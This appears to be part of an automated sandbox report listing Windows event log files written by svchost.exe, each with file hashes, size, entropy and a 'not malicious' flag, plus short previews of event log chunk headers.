                                                        SSDEEP:1536:xbBN2A4VD7VAx8whAGU2woJQghcI5oIRA4Hw:
                                                        MD5:4FB8E2CF8B3F20534836684947962DC2
                                                        SHA1:B263607E627C81DA77DB65DF5AED2F3FD84B83E2
                                                        SHA-256:DEAB680C467984C31D118AC595F0F57E573CEEC460CC4B43FCEB0BD66F731294
                                                        SHA-512:D982DB741A044E222D567712FB4799FF6524A1D451C3D2EE3DF7EB17031AD20EF4EC7098BCFB3E2B00C929EB6569C858EFCF275B28240425E4BF8D994AED9053
                                                        Malicious:false
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):4.15655690871689
                                                        Encrypted:false
                                                        SSDEEP:768:SPB9TXYa1RFxRaayVadMRFyfqd9xZRta7Ea+5BVZUeaBhN1dJhlBlBJ9tFk6dd3s:eXY5nVYIyyqED5BVZUeouPZ
                                                        MD5:2DE60575CB719BF51FAB8A63F696B052
                                                        SHA1:BD44E6B92412898F185D5565865FEA3778573578
                                                        SHA-256:7C14D6D72CD2DE834A0C4D17A68B2584B83B81C647D2C439E1071600E29A803D
                                                        SHA-512:0471E7824795996992E736F33FEA7AF70EA909804DE3AC59EE76B5D0403901A5147558256C3AAE87BA8F1747D151DE63134661BEB9F6E0FF25AB0E3E89BC6B4A
                                                        Malicious:false
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):1.6158707870316427
                                                        Encrypted:false
                                                        SSDEEP:384:Xhdo69CcoTorNorWorbvorTorZorQorNor7orqorlGhorRor9orwTorYorDor+Y8:XDCYAb
                                                        MD5:7D96A672043812D898757610705AF164
                                                        SHA1:17AB04259076DC75C03E9C2FC38F6B501B7A3C1D
                                                        SHA-256:DEDA61C92BD81305343E512A227080BFC795A05D4112354FBB916436DC9CF26C
                                                        SHA-512:6CB3D9291892A865C3AA09BFED4908458E19FA1518149B22D13421F83A23D43EAA9CBD9D5369E3447D9DA211C592162BCAEEBD738A310123120241200D679D02
                                                        Malicious:false
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):0.8524226245257144
                                                        Encrypted:false
                                                        SSDEEP:384:JhAiPA5PNPxPEPHPhPEPmPSPRP3PoPpPTP8PXPr5P:J2Nr
                                                        MD5:B8E105CC52B7107E2757421373CBA144
                                                        SHA1:39B61BEA2065C4FBEC143881220B37F3BA50A372
                                                        SHA-256:B7EE076088005866A01738ECD3421A4DA3A389FFB9EEB663687823E6647F7B4B
                                                        SHA-512:7670455904F14DA7A9EEFBAD5616D6D00EA262C979EDABB433182500B6EF918C6E534C94DF30D829016C8539DF12CAD5F53EC884C45AA71ACA35CF9B797361BC
                                                        Malicious:false
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):0.8432997252442703
                                                        Encrypted:false
                                                        SSDEEP:384:4hZ21JJgL4JJFiJJ+aeJJ+WBJJ+5vJJ+/UJJ+4fJJ+CwJJ+D2JJ+a2JJ+JtJJ+l9:4WXSYieD+tvgzmMvRpBWfb
                                                        MD5:39EE3557626C7F112A88A4DE12E904C1
                                                        SHA1:C307FECC944D746A49EEA6451B7DA7301F03504C
                                                        SHA-256:2B47146267E6F31192C54D3EDA77EC9ABE6A88B1C72BA9FE789C8073FD632A5A
                                                        SHA-512:304C866E246B3F63BF126B33AED784913A078D44913FD987D896D2D960578B61BA7E24BA3CB8FC76608AB1E5702D0FE587A5FB8C38CDF8913D60F88B1435A2D9
                                                        Malicious:false
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):2.9223892466691472
                                                        Encrypted:false
                                                        SSDEEP:384:whqhSx4h/y4Rhph5h6hNh5hah/hrhbhmhjh/h7hkh8hbhMh9hYwhChwh8hRqh28t:wbCyhLfIXBS5
                                                        MD5:93BC7C28E3A7B0EC7634432FFB5F26AE
                                                        SHA1:388548D6291DA80F672153D1C18E32BDA335AA90
                                                        SHA-256:D354F4EA745283540D197B6D4C57EFC4F539F7566CFB3A06AEBD1243CD222EE1
                                                        SHA-512:3235FEA5A58C72DCD680D436AA2652F5221C6AC6F5A53882C7817A8A65E63C13087CD5660839FC7CFA0F62C666014608B91ABB4235EF5F79F68EF5806252F84A
                                                        Malicious:false
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):2.838106263184782
                                                        Encrypted:false
                                                        SSDEEP:768:ccMhFBuyKskZljdoKXjtT/r18rQXn8r3e5POH:JMhFBuVge
                                                        MD5:A2D41740C1BAF781019F282E37288DDF
                                                        SHA1:A6FE635B3EC8A6923EDE10C23FC79DD32EF4F621
                                                        SHA-256:7008D3010B17C0B09643D10D26B19FB971BB1963C414C1466BEAD617CF9F15E7
                                                        SHA-512:E33A0A2F9473D2D05E9704FE16E6EE34FB51FD8E25A3D60E1F7A67665CA14421B6511D896526AFC7CAE1BF629BB7013FA10663620C5450F1BB51A465EF5A51CB
                                                        Malicious:false
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):4.634418630947688
                                                        Encrypted:false
                                                        SSDEEP:768:/VQ+uYvAzBCBao/F6Cf2SEqEhwaK41HZaUeI36ISKEeKRe:cH
                                                        MD5:A00BAFFCABB00428EA0512FCECCC55E5
                                                        SHA1:19F7C942DC26C3FF56D6240158734AFF67D6B93E
                                                        SHA-256:92264C9E28AB541669DED47CFAF1E818EBD863FA9E8FC6B0F52175D694A9E0D9
                                                        SHA-512:DF94AA8FA0610A0EFE7BAC0DB2A01645A4CD1C7FAD62E914EF914B526B651ED62600F63909D26149FD17C259348DADE05F48759B1DF092970251DB86690CC2B6
                                                        Malicious:false
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):2.0646587531847893
                                                        Encrypted:false
                                                        SSDEEP:384:eh1kbAP1gzkw3kN5Ayqk+HkzGk+hkV3SuckzlckA66k+4DkzRxk+dkzwUk+rkzDK:eMAP1Qa5AgfQQgniwS
                                                        MD5:399CAF70AC6E1E0C918905B719A0B3DD
                                                        SHA1:62360CD0CA66E23C70E6DE3340698E7C0D789972
                                                        SHA-256:FD081487CCB0ACEAD6F633AADBA4B977D2C9360CE8EAC36EAB4E3C84A701D849
                                                        SHA-512:A3E17DA61D4F7C0C94FD0B67707AE35250656842D602906DE515B5E46ECD5078AC68AE607B99DC1A6061B0F896759FE46FF8EE350774205635D30363D46939EA
                                                        Malicious:false
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):4.4364303862010575
                                                        Encrypted:false
                                                        SSDEEP:384:PhrE2E+EAsbE3VgEWsUiEcEf4eEOhEmELVFEEE5ejElEreEFEzEAEWE+EWEeEKEy:P3sleByhfIwPGa1SEzy
                                                        MD5:2BB73ACC8F7419459C4BF931AB85352C
                                                        SHA1:F1CE2EB960D3886F76094E2327DD092FC1208C7E
                                                        SHA-256:1969400F6FC72AD4A41092FEC53A19078C98DE9FCB2507A3BD8E1930B2447B62
                                                        SHA-512:7D882184DA11B490E111502C8193B73248259D43CC5DCE021CD7264212F1BCD3D62F2A3A2F86929663E2E904961D4F1E406E314020FE904D41694A09C1EB0457
                                                        Malicious:false
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):3.0631557320109892
                                                        Encrypted:false
                                                        SSDEEP:384:xhYCAKRuKIYKxkKiCKVIAK8sL4K5VKjPKwnKZ/K50K8/0KXAKuWKSlK+NK8t3KlZ:x1T4hGvj
                                                        MD5:86AEA3A9CA3E5909FD44812754E52BD6
                                                        SHA1:F79B583F83F118AC724A5A4206FC439B88BB8C65
                                                        SHA-256:2AB21F158F9FFA0A375B2ABBD58880A732FABBC436246D40A68DD88D324428C9
                                                        SHA-512:17796DAA6BCE3C6B7EBACD2A683D085AB08C7701DB5FF91DC2D6531E9CC23FCFC52650A6CD02D8B54D4E8C8D5B59DB1688E18571587E0431E4AA914086BE26F5
                                                        Malicious:false
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):2.4467272005363894
                                                        Encrypted:false
                                                        SSDEEP:384:EEhFiDhKxDmqIDrfDYEDdDDDbDOD2DSD+DtDFDxDlDUDEDoDADeDuDx4DWDXDjD6:JzSKEqsMuy6TN
                                                        MD5:155681C222D825199B738E8DEC707DC8
                                                        SHA1:704C800E7313F77A218203554E1428DF2819BC34
                                                        SHA-256:1505E543085CB6AA30119F10DF11AC8CE061DB0CAC6D44A640E711F96750C4BF
                                                        SHA-512:ADDDE8E26D330EAA13F993D17FF4A6DE7F4120E5B36205EB69FC999B0462B21FD189317EFD1002618551EE24E5C753A09EB34955E8CF1A8E2A22D27516BAB720
                                                        Malicious:false
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):2.156155224835584
                                                        Encrypted:false
                                                        SSDEEP:384:MhMLzI9ozTxzFEz3zLzWztCzizQzzz5zqfzDz5z1zkzSz9zEzWz+zQzqbzUTz3zE:Mmw9g3LU
                                                        MD5:F22AC858C2ACC96E8F189E43FFE46FBD
                                                        SHA1:540B8276921D37FCFFDA3FC7BCFAE1D99A85433B
                                                        SHA-256:771A6E4098CB30081338F06DD7C0B54248C133F9B7B6849FDADDBD6E6FD5BCE9
                                                        SHA-512:B4CF3C51B9FB236207B19FE697CEF6E402C6C903E7570B3938F529E5438F96E230463B9A9B17784A98E580E2B18AA9626E96AA83F705D506AF9C2A0432F0F7D5
                                                        Malicious:false
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):1.9197999988543422
                                                        Encrypted:false
                                                        SSDEEP:384:ehqID7I26vIxIPIttIo0IPrI5IMILIjI7I1IIIfrIBBLIgITI:ecx
                                                        MD5:6C3F290FC62CFA9C240AEE8DB1DBA277
                                                        SHA1:CFACCF81F3AA31E8DE85CEAFDAA55AA90FA18BEC
                                                        SHA-256:7841FBB35636229AFB0389965D3DDBD0B7DF4858F1DA8A8FF434830DB8B133D6
                                                        SHA-512:D2C60875EFADB1F3421CDC095B00E32419C0266CB4F58B17AF09A82AAA20EB488C757BA07E7562A033B84A37B3E035C405200BFB29330F79CA565FF21F5EDA88
                                                        Malicious:false
                                                         Preview:ElfChnk... [EVTX chunk: 'ElfChnk' signature, then binary header and record bytes the sandbox renders as '.'; the readable UTF-16LE strings are Event, xmlns=http://schemas.microsoft.com/win/2004/08/events/event, System, Provider, Name, Guid, EventID, Qualifiers, Version]
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):5.718426658668259
                                                        Encrypted:false
                                                        SSDEEP:384:Thka5Ka5WsR9o2KbzyzIz7a5NsR9o2KbzyzIzia5zzuzNz0zxzuewKWMK/2a55wt:Tdqlt94xODljQdM
                                                        MD5:8630011707C7BFBCECC0A9430637802E
                                                        SHA1:22247A5B6A4C01883BB14E0BD4575A3553F945CB
                                                        SHA-256:227057F9899098B21709D53114E9DECFFCD28207BFFA178AD6B1E32F9C63EDDF
                                                        SHA-512:972629871B28EA6D01B8762B28378F8348E592BD465FE7FD1CF6AB5BD62157230AD3BB729F6290F6EDA950AB20598110676D902756E40BA3067ED37831855076
                                                        Malicious:false
                                                         Preview:ElfChnk... [EVTX chunk: 'ElfChnk' signature, then binary header and record bytes the sandbox renders as '.'; the readable UTF-16LE strings are Event, xmlns=http://schemas.microsoft.com/win/2004/08/events/event, System, Provider, Name, Guid, EventID, Qualifiers, Version]
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):0.9963080376858662
                                                        Encrypted:false
                                                        SSDEEP:384:l7h1hM7MpMEaMWFMu/Ma2M+AMmGM1cMNF3Mg9Ml7MABMczM0cMKhMLaMA0MJvMZy:l7eJw
                                                        MD5:A51AFE78FA4481FA05EDC1133C92B1D8
                                                        SHA1:5BA44E7A99EE615E323696742DA6B930E9FF6198
                                                        SHA-256:44C1977D16383DF6B1FFF8164F319DFD99092A124ABA7C7280D74A6BB8AD2094
                                                        SHA-512:792E5E8F5540DCA4B7F003C1043DCBC3E0EC3F23EC4A7B0FA84357F6ABDFD84122C124DBEA2B61D3B5CEED79A3E158DBE95DFCDB20EEAC433D9CDC29C3328F22
                                                        Malicious:false
                                                         Preview:ElfChnk... [EVTX chunk: 'ElfChnk' signature, then binary header and record bytes the sandbox renders as '.'; the readable UTF-16LE strings are Event, xmlns=http://schemas.microsoft.com/win/2004/08/events/event, System, Provider, Name, Guid, EventID, Qualifiers, Version]
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):4.076996627399968
                                                        Encrypted:false
                                                        SSDEEP:384:Ihk1EL1I1Vh1C1D161f1f181L1tY1VGm1Q1L1p1VG1U1Z1s1VA141c1Vc1q1tS12:IBjdjP0cs6N
                                                        MD5:A8ADBDC2B39B55444B2C844F7D81EBDE
                                                        SHA1:F97F40E314C8A2A39953A28CB72C9270D3073418
                                                        SHA-256:93CF0EF4C121FCBB18A8A6DA5912415AF1113816BE6A8F9B86BE6A2243408E09
                                                        SHA-512:922D165CBE871A393D58DAABABE7D09557E242BF73C2C473C29CCB0FB3277B8119911EFF51B12238D23B613AD9C15DAB163C9757BC9006D768B2345F53436E7B
                                                        Malicious:false
                                                         Preview:ElfChnk... [EVTX chunk: 'ElfChnk' signature, then binary header and record bytes the sandbox renders as '.'; the readable UTF-16LE strings are Event, xmlns=http://schemas.microsoft.com/win/2004/08/events/event, System, Provider, Name, Guid, EventID, Qualifiers, Version]
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):3.2270516322734055
                                                        Encrypted:false
                                                        SSDEEP:384:khhDIEQAGxIHIFIWInIfEITQIAIQIfID8IaxIcI8IfRITGIHUI6IwI2IVIWIfRGQ:khZxGp969
                                                        MD5:2DB9B1A1F02360FE513803E6301D6579
                                                        SHA1:793571D3F7152764B6D42420CA8591EADEC753A1
                                                        SHA-256:054197E1C5C406838B73973BDD7E205150D4EB4D2EB81C003B6550616AF59E84
                                                        SHA-512:5B7A6B93CC053E90252012119D0C341D7512B7716F566757849E06625AE9762AB159ADD3C54A2B76C45FCF1741717092AD6BDB7F0E3BC8550B95D08C44B9D590
                                                        Malicious:false
                                                         Preview:ElfChnk... [EVTX chunk: 'ElfChnk' signature, then binary header and record bytes the sandbox renders as '.'; the readable UTF-16LE strings are Event, xmlns=http://schemas.microsoft.com/win/2004/08/events/event, System, Provider, Name, Guid, EventID, Qualifiers, Version]
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):0.801423310886069
                                                        Encrypted:false
                                                        SSDEEP:384:dh6iIvcImIvITIQIoIoI3IEIMIoIBIDIcIwISIEzIJVI:doxJS
                                                        MD5:9EAAD7982F42DFF47B8EF784DD2EE1CC
                                                        SHA1:542608204AF6B709B06807E9466F7543C0F08818
                                                        SHA-256:5468A48533B56DE3E8C820B870493154775356CE3913AD70EC51E0D1D0D1A366
                                                        SHA-512:036BFABE2AC4AD623B5C439349938C0EA254BFCDAB9096A53253189D4F632A8A8A1DD00644A4573AF971AAEA6831317BFD663E35363DD870684CDD4C0A51884C
                                                        Malicious:false
                                                         Preview:ElfChnk... [EVTX chunk: 'ElfChnk' signature, then binary header and record bytes the sandbox renders as '.'; the readable UTF-16LE strings are Event, xmlns=http://schemas.microsoft.com/win/2004/08/events/event, System, Provider, Name, Guid, EventID, Qualifiers, Version]
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):2.996272372482282
                                                        Encrypted:false
                                                        SSDEEP:768:e4u1n8zfFFU1x4Dk13xIb13xIb13xIt13xIi13xI513xIU13xI013xIF13xIH137:M
                                                        MD5:4F68D6AF0C7DB9E98F8B592C9A07811C
                                                        SHA1:9F519109344DD57150F16B540AAA417483EF44FE
                                                        SHA-256:44177E6F71E240EBFE9CE63FEFBF5D46A01979E09C0C14F65F1D19AE8E97B8EE
                                                        SHA-512:E1D5097BCD572F3DBAF4024FAEA76BAD3061CD2E05017701B578020327969C2BD3F725FBE8BFE4C40DC66336CE1371E7AB037058603B02449366DAE4EDE8DE69
                                                        Malicious:false
                                                         Preview:ElfChnk... [EVTX chunk: 'ElfChnk' signature, then binary header and record bytes the sandbox renders as '.'; the readable UTF-16LE strings are Event, xmlns=http://schemas.microsoft.com/win/2004/08/events/event, System, Provider, Name, Guid, EventID, Qualifiers, Version]
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):4264
                                                        Entropy (8bit):4.187102023329358
                                                        Encrypted:false
                                                        SSDEEP:96:ka/tuKNVaO80o1nyA2WyfWy0fyXY9yu/Ny/:Ltu8V7wnyA2WyfWy0fyXY9yu/Ny/
                                                        MD5:1CAF0497C7439ABC5852A45274FB411A
                                                        SHA1:5C6D01541991D9CC55B85F6EAAD5A96859315B29
                                                        SHA-256:D839376EECFF56B80407B6A8A2942E38919FDAF04015866481DC1C7AD093771F
                                                        SHA-512:F9D9362961367928B0034A6FF8E56D800C3F3B150F22D5BE7F49D92BF8AFF830D4947BB19E36B8203F4CFDA2331F2DE74615C7E4EF8EF77BF3709FF919B0C61B
                                                        Malicious:false
                                                         Preview:ElfChnk... [EVTX chunk: 'ElfChnk' signature, then binary header and record bytes the sandbox renders as '.'; the readable UTF-16LE strings are Event, xmlns=http://schemas.microsoft.com/win/2004/08/events/event, System, Provider, Name, Guid, EventID, Qualifiers, Version]
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):4.739533853103722
                                                        Encrypted:false
                                                        SSDEEP:384:jh+rKvKaKNP6WKkvKWKlpKuyK7YKmKaKHxqKWyK11KUIKqKq9KLjK5yKoKfKYKnb:jkN2cTOsK+C2qNLwziOr9NrjzDbRt
                                                        MD5:55E0313A260959DFBBF0CD2B7283EBEB
                                                        SHA1:887EDDBD0ECD8357F09BC7C7A7776EE6C24D5E05
                                                        SHA-256:8294E68932AA52FC34777DCB2278F737E1BB8AD2624918642F1BEEC2F9C8A13C
                                                        SHA-512:86596B26D669CD4CB9887595013F57EA5C084E86AD90EF35E4BFB7882932CB051C1A109F0C76DB52F15B2ABA130C605CEA27B116AA452D5972DEAA477D74FB57
                                                        Malicious:false
                                                         Preview:ElfChnk... [EVTX chunk: 'ElfChnk' signature, then binary header and record bytes the sandbox renders as '.'; the readable UTF-16LE strings are Event, xmlns=http://schemas.microsoft.com/win/2004/08/events/event, System, Provider, Name, Guid, EventID, Qualifiers, Version]
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):0.7590316238843728
                                                        Encrypted:false
                                                        SSDEEP:384:IhP8o8Z85848V8M8g8D8R8E8T8h8p8TtP8sU8:Ic
                                                        MD5:B074238315662886E2BD70106D08A747
                                                        SHA1:5ADA158D19401565E76349FCA97489E9FB9BFA36
                                                        SHA-256:53770508DCDA0199A75458B5A10DC8FD2E49A4CFD0FC001C16D56F3B567AB71C
                                                        SHA-512:9D35DC04CCE95541551254BCBB00B0E2E0860D9B6F69D40FBC829DA31FC3AC43690A049A432BA4D43315B80675143A6AA02C57484E7903845010A5AD9EC92D6D
                                                        Malicious:false
                                                         Preview:ElfChnk... [EVTX chunk: 'ElfChnk' signature, then binary header and record bytes the sandbox renders as '.'; the readable UTF-16LE strings are Event, xmlns=http://schemas.microsoft.com/win/2004/08/events/event, System, Provider, Name, Guid, EventID, Qualifiers, Version]
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):3.751304651738097
                                                        Encrypted:false
                                                        SSDEEP:1536:JXhaUyS+z1VV18o838c8bUc8cVVsz8VX8SoX8aA8cmtpjAiVB18dwE4vjcYoMjn1:JXwnS
                                                        MD5:DBDD49092AAB51CA8C9DE47231576C1C
                                                        SHA1:B351D8EB098AEC7B0F5C7FBF99D56E844ADA80BA
                                                        SHA-256:61D06748F842579D81ACCE00FEAFE9D57B5802C266DD1D8F851CB6900FE74C48
                                                        SHA-512:59A93EB7ED5A9FC2AFB33EFF53A29178B907594DFB5CA00D79EA649226B35F24A0A017C6DFE31553CE8F1FF99AFE06E2583950C94FE56E69A0E29EDBFE04AEF7
                                                        Malicious:false
                                                         Preview:ElfChnk... [EVTX chunk: 'ElfChnk' signature, then binary header and record bytes the sandbox renders as '.'; the readable UTF-16LE strings are Event, xmlns=http://schemas.microsoft.com/win/2004/08/events/event, System, Provider, Name, Guid, EventID, Qualifiers, Version]
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):2.3069197485541766
                                                        Encrypted:false
                                                        SSDEEP:768:S0VsLY/Z5aFka2aKazzabCafama5Sa0ra6rzaJcavkao9O0apPaQOan6qa6IvV1:ycEu
                                                        MD5:E6E4C860CE7DD1BB499D6A082B461B90
                                                        SHA1:11330861B23B1D29D777D9BD10619A07B6A6A9C0
                                                        SHA-256:C27431D9C64F5C9D323E2B4ED5F44781969B34F30DC4280296A329DCD6509D44
                                                        SHA-512:7393A0FF290BB3DB07E8BB9A9FA7B666CD8B686CBDAA3FED2EBD704D6E88A4D5768D104BD768E6AA533C42588C661A863E11ED9146ABD7386A2A9B4F84583406
                                                        Malicious:false
                                                         Preview:ElfChnk... [EVTX chunk: 'ElfChnk' signature, then binary header and record bytes the sandbox renders as '.'; the readable UTF-16LE strings are Event, xmlns=http://schemas.microsoft.com/win/2004/08/events/event, System, Provider, Name, Guid, EventID, Qualifiers, Version]
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):3.8593445672690927
                                                        Encrypted:false
                                                        SSDEEP:384:ahHBiQk1bdzpFEVQCd3iDzJiLQKiDBi4k1bdzpFEVQ35yY3dik5pmik5pbik5pKU:ah0w+qLpBVi7CPME79nCxkSq
                                                        MD5:5AE0C3F2DDDBD1C231ABBE6B13B712DF
                                                        SHA1:E337AC48B8A0192A9C09C2B747AF2BB52DCA67E7
                                                        SHA-256:B9CD7A241840A211B585113857AC9B56BC631423B61E12F300050F79815BCAD8
                                                        SHA-512:3C7CA015F3834519AD1AC4881D649B2065858B1368C2CFC590C50DF695F09B5C4AE7CD435F76D032A9978772B79F945706B21802172B33E0AD6847763048BEE5
                                                        Malicious:false
                                                         Preview:ElfChnk... [EVTX chunk: 'ElfChnk' signature, then binary header and record bytes the sandbox renders as '.'; the readable UTF-16LE strings are Event, xmlns=http://schemas.microsoft.com/win/2004/08/events/event, System, Provider, Name, Guid, EventID, Qualifiers, Version]
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):4.2909571978750325
                                                        Encrypted:false
                                                        SSDEEP:384:Ny2/hDGCyCkCzCRCFCNClCuC6CoC9rC6CdCsCvCkxCkC5CCCWCxCIC/CbCFC5CkG:Ny2/dm1sR
                                                        MD5:B0BF4D9EC91ABBDA5D328631B125A5C0
                                                        SHA1:E672D69127AE7C1A51046ADAA911871EC0C10ABB
                                                        SHA-256:8DBE6F5B80B3D973BBF1177BCCAA690B9F90FC99DC358B7DE66175317C733501
                                                        SHA-512:3132E1FCC5C8F88BD974465EA1E644CA89C2D9E041E49F8A1F48B9ACB3376F0A1042F5CB6FDFC6BE2934C4483312C35539D64DB25B892388604F9F637074BCBD
                                                        Malicious:false
                                                         Preview:ElfChnk... [EVTX chunk: 'ElfChnk' signature, then binary header and record bytes the sandbox renders as '.'; the readable UTF-16LE strings are Event, xmlns=http://schemas.microsoft.com/win/2004/08/events/event, System, Provider, Name, Guid, EventID, Qualifiers, Version]
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):4.488768580471203
                                                        Encrypted:false
                                                        SSDEEP:1536:Q9YcieRoUlafdbkKKMAQ2SomvXCQv/2ketsvQPh8YzSJoh2VgPIEF6uq9GgCVRlW:Q9YcieRoUlaFbkKKMAQ2SomvXCM/2keU
                                                        MD5:E3FB1708C64D250E4D801AFB8688DF35
                                                        SHA1:8B889F0358683733257411E451A86E3A1D42159D
                                                        SHA-256:0B62FDD9A57B1809D79561AE64BE30DD7430815D6954A5E3DF90E29E1B2E6C72
                                                        SHA-512:2F5CC514B180A39E5961452A594FE5384A6369CBCB7A1CEBAC37948770A6CB999A2E2F26A32240058D5D7A335904DAF40C88F1C096D8F85907F23E9B32E79ABE
                                                        Malicious:false
                                                         Preview:ElfChnk... [EVTX chunk: 'ElfChnk' signature, then binary header and record bytes the sandbox renders as '.'; the readable UTF-16LE strings are Event, xmlns=http://schemas.microsoft.com/win/2004/08/events/event, System, Provider, Name, Guid, EventID, Qualifiers, Version]
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):4.4977157302559725
                                                        Encrypted:false
                                                        SSDEEP:1536:HcRFkL1TWX0gkB/J7oasEfyk2/vKlqRi/PgTZSXwyvy8fJpfrAW+Cr6SXlUr20Gy:HcRFkL1TWX0gkB/J7oasEfyk2/vKlqkK
                                                        MD5:6D2504DD395F5A41EA44AAE3526F8BF3
                                                        SHA1:7E24C2BEF3B300DC514EB6C2E72971D1B8E1A711
                                                        SHA-256:0027C48343D5E8A308B48A357F2FF7BB8D8484C0EC1F9B9B1F840A5D937DED56
                                                        SHA-512:504E03F873C07A0AC9A81DFD78265814217D8F42130829C95C7BDFC6359F0B9D20E0B229767E26F25731E2F415628A399F1E908D3CB194FA0640C222FCC33608
                                                        Malicious:false
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):4.494457161353947
                                                        Encrypted:false
                                                        SSDEEP:384:ZhN7s7o787l7r787a7J7z7+7N17g7x7c7g7gY7hZ7D7k7F7r7wm7NP7Y7+7fa7lX:Z9vuCg
                                                        MD5:2C68AC8F7DC18D0B9BE4EC15DA85A3A3
                                                        SHA1:E097A815A66A6A0866BE30DFA0E887A5DEBA1849
                                                        SHA-256:3209650E56ECAA5ADD7CB341D9D48591E5691D7B237E34D8C35F453ECFFC7B1A
                                                        SHA-512:C01412A6097E2E9F6EA913E6A1F545A19323B14EA529094E2FC9555EE28A8586883BCD4DE93FFE03C0FE327D73EFCFD9A0C96A091077FC12A066CEFF21C8D4E5
                                                        Malicious:false
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):2.1499045494600955
                                                        Encrypted:false
                                                        SSDEEP:384:Dhc+uaNuru+uhuKVuPJu5u9u4ufuTuxuDuvuDuOuXumui+udutui4uTAuFuauind:D6Ovc0S5UyEeDgLslstY
                                                        MD5:2045FB0D54CA8F456B545859B9F9B0A8
                                                        SHA1:35854F87588C367DE32A3931E01BC71535E3F400
                                                        SHA-256:E4305D5E1125E185F25AABA6FF9E32DE70B4EFD7264FE5A0C7C2EF3C33989C45
                                                        SHA-512:013CAC4CBF67C9AB5D2A07E771BAF81950E5A256F379E3C2E26CC9E8E47379579470CC6FD56E93B31C4D17935713D1FC6026307427D77CBE9647139E3D73AC47
                                                        Malicious:false
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):0.8164696340947971
                                                        Encrypted:false
                                                        SSDEEP:384:jhGuZumutu4uEu5uOuDuyb2uPu1uRu3uGuHu9/u:jr
                                                        MD5:1AB19FA472669F4334C7A9D44E94E1B3
                                                        SHA1:F71C16706CFA9930045C9A888FDB3EF46CACC5BC
                                                        SHA-256:549D89A256E3C71AFCBF551EC9BEDBDB3CF2DC74B4F8C214FDC1D270FB731F6E
                                                        SHA-512:72F1F20CB1F2984B318E4A2AAEE11D573441A77D04C0577D24E19F89E85F1691CB29EF569BD25EBBBD313C7B9DB945DB43D52EEFC2EF33E7BEECDFB8E0BBC404
                                                        Malicious:false
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):0.9855903635327656
                                                        Encrypted:false
                                                        SSDEEP:384:cxNhPALAb/A0D6AKAlAfyVAQhAQueA4AIAwA0AYAwA+/AfAjrA3DA:cxN90yzXd
